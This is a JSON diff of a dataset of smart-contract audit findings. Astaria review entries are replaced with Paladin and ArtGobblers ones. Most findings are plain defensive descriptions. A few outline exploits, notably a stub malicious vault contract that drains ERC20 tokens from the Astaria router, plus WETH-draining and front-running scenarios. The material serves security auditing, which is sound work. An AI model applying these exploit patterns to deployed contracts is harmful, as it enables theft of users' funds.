{ - "title": "Lien buyouts can push maxPotentialDebt over the limit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought out lien. Valid refinances can make the rate lower or the time longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien.", + "title": "Improve checks for past quests in increaseQuestReward() and increaseQuestObjective()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily, execution is stopped at _getRemainingDuration(questID); however, it would be more logical to put this check near the start of the function. function increaseQuestReward(...) ... { updatePeriod(); ... require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, \"QuestBoard: New reward must be higher\"); ... uint256 remainingDuration = _getRemainingDuration(questID); require(remainingDuration > 0, \"QuestBoard: no more incoming QuestPeriods\"); ... } The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. This is not what you would expect from this function. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; return (lastPeriod - currentPeriod) / WEEK; // can revert }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Liens cannot be bought out once we've reached the maximum number of active liens on one collateral", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral: if (params.stack.length >= s.maxLiens) { revert InvalidState(InvalidStates.MAX_LIENS); } The result is that, when we already have maxLiens and we try to buy one out, this function will revert.", + "title": "Should make use of token.balanceOf(address(this)); to recover tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Currently, when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contract's balance of token beforehand. This requires an extra step and can easily be done inside the function itself.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] },
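A sketch of the "Should make use of token.balanceOf(address(this)); to recover tokens" suggestion above, assuming a simple owner check and OpenZeppelin's SafeERC20; this is not Paladin's actual implementation:

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract RecoverSketch {
    using SafeERC20 for IERC20;

    address public immutable owner = msg.sender;

    // Sweep the full current balance instead of asking the caller for an amount.
    function recoverERC20(address token) external returns (bool) {
        require(msg.sender == owner, "not owner");
        IERC20 t = IERC20(token);
        t.safeTransfer(owner, t.balanceOf(address(this)));
        return true;
    }
}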
{ - "title": "First vault deposit can cause excessive rounding", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH. function mint( uint256 shares, address receiver ) public virtual returns (uint256 assets) { // assets is 10e18, or 10 WETH, whenever totalSupply() == 0 assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up. // Need to transfer before minting or ERC777s could reenter. // minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per share of 1:1e18). Albeit, at a higher cost to the minter to set the initial price that high.", + "title": "Floating pragma is set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The current pragma Solidity directive is ^0.8.10. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When the collateral is listed by the borrower, s.auctionData[collateralId].liquidator (and s.auctionData in general) will not be set, so it will be address(0), and thus the liquidatorPayment will be sent to address(0).", + "title": "Deflationary reward tokens are not handled uniformly across the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _appendStack, we have the following block: newStack = new Stack[](stack.length + 1); newStack[stack.length] = newSlot; uint256 potentialDebt = _getOwed(newSlot, newSlot.point.end); ...
if ( stack.length > 0 && potentialDebt > newSlot.lien.details.maxPotentialDebt ) { revert InvalidState(InvalidStates.DEBT_LIMIT); } Note, we are only performing a comparison between newSlot.lien.details.maxPotentialDebt and potentialDebt when stack.length > 0. If _createLien is called with params.stack.length == 0, we would not perform this check and thus the input params are not fully checked for misconfiguration.", + "title": "Typo on comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Across the codebase, there is a typo in a comment. The comment can be seen below. * @dev Returns the number of periods to come for a give nQuest", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Previous withdraw proxy's withdrawReserveReceived is not updated when assets are drained from the current withdraw proxy to the previous", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When drain is called, we don't update the s.epochData[s.currentEpoch - 1]'s withdrawReserveReceived; this is in contrast to when withdraw reserves are transferred from the public vault to the withdraw proxy. This would unlink the previous withdraw proxy's withdrawReserveReceived storage parameter from the total amount of assets it has received from either the public vault or the current withdraw proxy. An actor can manipulate the value of B_{n-1} - W_{n-1} by sending assets to the public vault and the current withdraw proxy before calling transferWithdrawReserve (B_{n-1} is the previous withdraw proxy's asset balance, W_{n-1} is the previous withdraw proxy's withdrawReserveReceived and n is the public vault's epoch). B_{n-1} - W_{n-1} should really represent the sum of all near-boundary auction payments the previous withdraw proxy receives plus any assets that are transferred to it by an external actor. Related Issue 46.", + "title": "Require statement with gauge_types function call is redundant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The gauge_types function of the Curve GaugeController reverts when an invalid gauge is given as a parameter, so the QuestBoard: Invalid Gauge error message will never be seen in the QuestBoard contract. The documentation can be seen in Querying Gauge and Type Weights. function createQuest(...) ... { ... require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, \"QuestBoard: Invalid Gauge\"); ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "Update solc version and use unchecked in Uniswap related libraries", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The highlighted libraries above are referenced from the Uniswap codebase, which is intended to work with Solidity compiler <0.8. These older versions have unchecked arithmetic by default and the code takes it into account. Astaria code is intended to work with Solidity compiler >=0.8, which doesn't have unchecked arithmetic by default. Hence, to port the code, it has to be turned on via the unchecked keyword.
For example, FullMathUniswap.mulDiv(type(uint).max, type(uint).max, type(uint).max) reverts for v0.8, and returns type(uint).max for older versions.", + "title": "Missing setter function for the GAUGE_CONTROLLER", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again. address public immutable GAUGE_CONTROLLER; constructor(address _gaugeController, address _chest){ GAUGE_CONTROLLER = _gaugeController; ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Medium Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "buyoutLien is prone to race conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken.buyoutLien and VaultImplementation.buyoutLien are both prone to race conditions where multiple vaults can try to front-run each others' buyoutLien call to end up registering their own lien. Also note, due to the storage values s.minInterestBPS and s.minDurationIncrease being used in isValidRefinance, the winning buyoutLien call does not necessarily have to have the best rate or duration among the other candidates in the race.", + "title": "Empty events emitted in killBoard() and unkillBoard() functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "When an event is emitted, it stores the arguments passed in for the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments passed into them, defeating the purpose of using an event.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Paladin", + "Severity: Informational" ] }, { - "title": "ERC20-Cloned allows certain actions for address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In ERC20-Cloned, address(0) can be used as: the spender, the to parameter of transferFrom, the to parameter of transfer, the to parameter of _mint, and the from parameter of _burn. As an example, one can transfer or transferFrom to address(0), which would make that amount of tokens unusable but would not update the total supply, in contrast to if _burn was called.", + "title": "The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] },
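To make the "Update solc version and use unchecked in Uniswap related libraries" porting concern above concrete, a sketch of one representative expression (the FullMath-style extraction of the largest power of two dividing a denominator), which relies on wrapping negation; the contract and function names are illustrative:

contract UncheckedPortSketch {
    // Under <0.8 this wrapping subtraction is silent; under >=0.8 it reverts
    // unless wrapped in unchecked, changing the library's behavior.
    function largestPowerOfTwoDivisor(uint256 d) public pure returns (uint256) {
        unchecked {
            return (0 - d) & d; // two's-complement trick: isolates the lowest set bit
        }
    }
}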
{ - "title": "BEACON_PROXY_IMPLEMENTATION and WETH cannot be updated for AstariaRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There is no update mechanism for BEACON_PROXY_IMPLEMENTATION and WETH in AstariaRouter. It would make sense to keep WETH non-updatable (unless we provide the wrong address to the constructor), but for BEACON_PROXY_IMPLEMENTATION there could be a case for making it upgradable.", + "title": "Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gobblers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] }, { - "title": "Incorrect key parameter type is used for s.epochData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In PublicVault, whenever an epoch key is provided to the mapping s.epochData its type is uint64, but the type of s.epochData is mapping(uint256 => EpochData).", + "title": "The function toString() does not manage memory properly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"memptr: \", freememptr); emit log_named_uint(\"str: \", raw_str_ptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on.
Proof of concept for case 2: function testToStringDirty() public { uint freememptr; // Make the next 4 bytes of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint(\"str: \", freememptr); emit log_named_uint(\"len: \", len); emit log_named_bytes32(\"data: \", data); assembly { freememptr := mload(0x40) } emit log_named_uint(\"memptr: \", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high-level Solidity will not have issues decoding values as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library.", "labels": [ "Spearbit", - "Astaria", + "ArtGobblers", "Severity: Low Risk" ] }, { - "title": "buyoutLien, canLiquidate and makePayment have different notion of expired liens when considering edge cases", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When swapping a lien that has just expired (the lien's end t_end equals the current timestamp t_now), one can call buyoutLien to swap it out. But when t_now > t_end, buyoutLien reverts due to the underflow in _getRemainingInterest when calculating the buyout amount. This is in contrast to canLiquidate, which allows a lien with t_now = t_end to be liquidated as well. makePayment also only considers t_end < t_now as expired liens. So the expired/non-functional time ranges for the different endpoints are: buyoutLien: (t_end, ∞); canLiquidate: [t_end, ∞); makePayment: (t_end, ∞).", + "title": "Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve user / developer experience. The following is a list of contract functions that still use require statements: ArtGobblers mintLegendaryGobbler ArtGobblers safeBatchTransferFrom ArtGobblers safeTransferFrom SignedWadMath wadLn GobblersERC1155B balanceOfBatch GobblersERC1155B _mint GobblersERC1155B _batchMint PagesERC721 ownerOf PagesERC721 balanceOf PagesERC721 approve PagesERC721 transferFrom PagesERC721 safeTransferFrom PagesERC721 safeTransferFrom (overloaded version)", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] }, { - "title": "Ensure all ratios are less than 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Although numerators and denominators for different fees are set by the admin, it's a good practice to add a check in the contract for absurd values.
In this case, that would be when the numerator is greater than the denominator.", + "title": "Minting of Gobbler and Pages can be further gas optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Currently, in order to mint a new Page or Gobbler users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will subsequently be burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly stacked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions to perform: mint $GOO (via removeGoo), and burn $GOO + mint the Page/Gobbler (via mintFromGoo), but rather use a single transaction that consumes the $GOO stacked on the Gobbler itself without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction and the gas cost will be much lower because it does not require any interaction with the Goo contract.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] }, { - "title": "Factor out s.slope updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Slope updates occur in multiple locations but do not emit events.", + "title": "Declare GobblerReserve artGobblers as immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers;", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Gas Optimization" ] },
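For the "Ensure all ratios are less than 1" finding above, a minimal sketch of the suggested sanity check; the storage names mirror the protocol-fee example earlier in this review and access control is omitted for brevity:

contract FeeConfigSketch {
    uint256 public protocolFeeNumerator;
    uint256 public protocolFeeDenominator = 1;

    function setProtocolFee(uint256 numerator, uint256 denominator) external {
        // Reject absurd values: the fee ratio must stay below 1 and never divide by zero.
        require(denominator != 0 && numerator < denominator, "ratio >= 1");
        protocolFeeNumerator = numerator;
        protocolFeeDenominator = denominator;
    }
}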
{ - "title": "External call to arbitrary address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router has a convenience function to commit to multiple liens, AstariaRouter.commitToLiens. This function causes the router to receive WETH and allows the caller to supply an arbitrary vault address lienRequest.strategy.vault which is called by the router. This allows the potential for the caller to re-enter in the middle of the loop, and also allows them to drain any WETH that happens to be in the Router. In our review, no immediate reason for the Router to have WETH outside of commitToLiens calls was identified and therefore the severity of this finding is low.", + "title": "Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC-165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument. Neither GobblersERC1155B nor ArtGobblers actually implements the ERC-165 supportsInterface function. Consider implementing the required ERC-165 supportsInterface function in the GobblersERC1155B contract.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Astaria's Seaport orders may not be listed on OpenSea", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "To list Seaport orders on OpenSea, the order should pass certain validations as described here (see OpenSea Order Validation). Currently, Astaria orders will fail this validation. For instance, zone and zoneHash values are not set as suggested.", + "title": "LogisticVRGDA is importing wadExp from SignedWadMath but never uses it", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The LogisticVRGDA is importing the wadExp function from the SignedWadMath library but never uses it.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Any ERC20 held in the Router can be stolen using ERC4626RouterBase functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "All four functions in ERC4626RouterBase.sol take in a vault address, a to address, a shares amount, and a maxAmountIn for validation. The first step is to read vault.asset() and then approve the vault to spend the ERC20 at whatever address is returned for the given amount. function mint( IERC4626 vault, address to, uint256 shares, uint256 maxAmountIn ) public payable virtual override returns (uint256 amountIn) { ERC20(vault.asset()).safeApprove(address(vault), shares); if ((amountIn = vault.mint(shares, to)) > maxAmountIn) { revert MaxAmountError(); } } In the event that the Router holds any ERC20, a malicious user can design a contract with the following functions: function asset() view pure returns (address) { return [ERC20 the router holds]; } function mint(uint shares, address to) view pure returns (uint) { return 0; } If this contract is passed as the vault, the function will pass, and the router will approve this contract to control its holdings of the given ERC20.", + "title": "Pages.tokenURI does not revert when pageId is the ID of an invalid or not minted token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The current implementation of tokenURI in Pages returns an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the case of a special tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] },
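For the ERC-165 finding above ("Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function"), a minimal sketch of the required hook; the interface IDs come from EIP-165 and EIP-1155, and the contract name is illustrative:

contract SupportsInterfaceSketch {
    function supportsInterface(bytes4 interfaceId) public pure returns (bool) {
        return
            interfaceId == 0x01ffc9a7 || // ERC-165 itself
            interfaceId == 0xd9b67a26 || // ERC-1155
            interfaceId == 0x0e89341c;   // ERC-1155 Metadata URI extension
    }
}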
{ - "title": "Inconsistency in byte size of maxInterestRate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In RouterStorage, maxInterestRate has a size of uint88. However, when being set from file(), it is capped at uint48 by the safeCastTo48() function.", + "title": "Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The current implementation of the ArtGobblers.feedArt function allows users to specify, via the value of the bool isERC1155 input parameter, whether the id passed is from an ERC721 or ERC1155 type of token. Without checking whether the passed nft address fully supports ERC721 or ERC1155, these two problems could arise: The user can feed an arbitrary ERC20 token to a Gobbler by calling gobblers.feedArt(1, address(goo), 100, false);. In this example, we have fed 100 $GOO to the gobbler. By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support the ERC721 or ERC1155 standard.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Router#file has update for nonexistent MinInterestRate variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "One of the options in the file() function is to update FileType.MinInterestRate. There are two problems here: 1) If someone chooses this FileType, the update actually happens to s.maxInterestRate. 2) There is no minInterestRate storage variable, as minInterestBPS is handled on L235-236.", + "title": "Rounding down in legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The expression below rounds down. (startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has a value of 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_AUCTION_INTERVAL).", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] },
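To make the rounding in the legendary-auction finding above concrete (taking LEGENDARY_AUCTION_INTERVAL = 581 from the finding and the minimum start price of 69 mentioned in the price-mechanics finding later in this review; the function signature is simplified):

contract RoundingSketch {
    uint256 public constant LEGENDARY_AUCTION_INTERVAL = 581;

    // With startPrice = 69 and numMintedSinceStart = 573:
    // 69 * (581 - 573) = 552, and 552 / 581 truncates to 0,
    // so the price reads zero for the last 8 mints of the interval.
    function legendaryPrice(uint256 startPrice, uint256 numMintedSinceStart) public pure returns (uint256) {
        return (startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL;
    }
}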
{ - "title": "getLiquidationWithdrawRatio() and getYIntercept() have incorrect return types", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "liquidationWithdrawRatio and yIntercept, like other amount-related parameters, are of type uint88, and they are the returned values of getLiquidationWithdrawRatio() and getYIntercept() respectively. But the return types of getLiquidationWithdrawRatio() and getYIntercept() are defined as uint256.", + "title": "Typos in code comments or natspec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Below is a list of typos encountered in the code base and / or natspec comments: In both Pages.sol#L179 and Pages.sol#L188 replace compromise with comprise In Pages.sol#L205 replace pages's URI with page's URI In LogisticVRGDA.sol#L23 replace effects with affects In VRGDA.sol#L34 replace actions with auctions In ArtGobblers.sol#L54, ArtGobblers.sol#L745 and ArtGobblers.sol#L754 replace compromise with comprise In ArtGobblers.sol#L606 remove the double occurrence of the word state In ArtGobblers.sol#L871 replace emission's with emission In ArtGobblers.sol#L421 replace gobblers is minted with gobblers are minted and until all legendaries been sold with until all legendaries have been sold In ArtGobblers.sol#L435-L436 replace gobblers where minted with gobblers were minted and if auction has not yet started with if the auction has not yet started In ArtGobblers.sol#L518 replace overflow we've got bigger problems with overflow, we've got bigger problems In ArtGobblers.sol#L775 and ArtGobblers.sol#L781 replace get emission emissionMultiple with get emissionMultiple", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "The modified implementation of redeem is omitting a check to make sure not to redeem 0 assets.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The modified implementation of redeem omits the check // Check for rounding error since we round down in previewRedeem. require((assets = previewRedeem(shares)) != 0, \"ZERO_ASSETS\"); You can see a trail of it in redeemFutureEpoch.", + "title": "Missing natspec comments for contract's constructor, variables or functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Some of the contracts' constructors, variables and functions are missing natspec comments.
Here is the full list of them: Pages constructor Pages getTargetSaleDay function LibString toString function MerkleProofLib verify function SignedWadMath toWadUnsafe function SignedWadMath unsafeWadMul function SignedWadMath unsafeWadDiv function SignedWadMath wadMul function SignedWadMath wadDiv function SignedWadMath wadExp function SignedWadMath wadLn function SignedWadMath unsafeDiv function VRGDA constructor LogisticVRGDA constructor LogisticVRGDA getTargetDayForNextSale PostSwitchVRGDA constructor PostSwitchVRGDA getTargetDayForNextSale GobblerReserve artGobblers GobblerReserve constructor GobblersERC1155B contract is missing natspec's coverage for most of the variables and functions PagesERC721 contract is missing natspec's coverage for most of the variables and functions PagesERC721 isApprovedForAll should explicitly document the fact that the ArtGobbler contract is always pre-approved ArtGobblers chainlinkKeyHash variable ArtGobblers chainlinkFee variable ArtGobblers constructor ArtGobblers gobblerPrice misses the @return natspec ArtGobblers legendaryGobblerPrice misses the @return natspec ArtGobblers requestRandomSeed misses the @return natspec ArtGobblers fulfillRandomness misses both the @return and @param natspec ArtGobblers uri misses the @return natspec ArtGobblers gooBalance misses the @return natspec ArtGobblers mintReservedGobblers misses the @return natspec ArtGobblers getGobblerEmissionMultiple misses the @return natspec ArtGobblers getUserEmissionMultiple misses the @return natspec ArtGobblers safeBatchTransferFrom misses all natspec ArtGobblers safeTransferFrom misses all natspec ArtGobblers transferUserEmissionMultiple misses the @notice natspec", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "PublicVault's redeem and redeemFutureEpoch always returns 0 assets.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "assets returned by redeem and redeemFutureEpoch will always be 0, since it has not been set in redeemFutureEpoch. Also, the Withdraw event emits an incorrect value for assets because of this. The issue stems from trying to consolidate some of the logic for redeem and withdraw by using redeemFutureEpoch for both of them.", 